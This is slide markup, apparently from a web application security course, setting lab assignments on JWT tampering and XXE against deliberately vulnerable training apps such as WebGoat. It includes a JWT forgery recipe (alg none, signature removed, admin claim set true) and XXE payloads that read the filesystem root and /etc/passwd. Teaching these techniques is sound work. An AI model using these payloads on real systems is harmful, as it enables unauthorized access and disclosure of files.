            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="3892168"/>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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Broken Auth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> JWT tokens  lesson#4  hack the JWT token  reset the votes as tom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to none ; remove signature ; change claim from admin false to true ; change = to %3d in converted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jwt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> token]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326712198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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Extensiosn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use JSON Web Tokens </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use JWT Brute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use JOSEPH/JSON web token attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311179734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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#21</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check any REST API for JWT usage &amp; vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>altoro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application OR rest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> API OR postman]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273284684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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML XXE Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What are the different payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample Github payloads</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399601259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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#22a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Webgoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Find XXE vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: Use below payloads:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE test [&lt;!ENTITY list SYSTEM "FILE:/"&gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE test [&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>passfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SYSTEM "file:/etc/passwd"&gt;]&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214444406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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
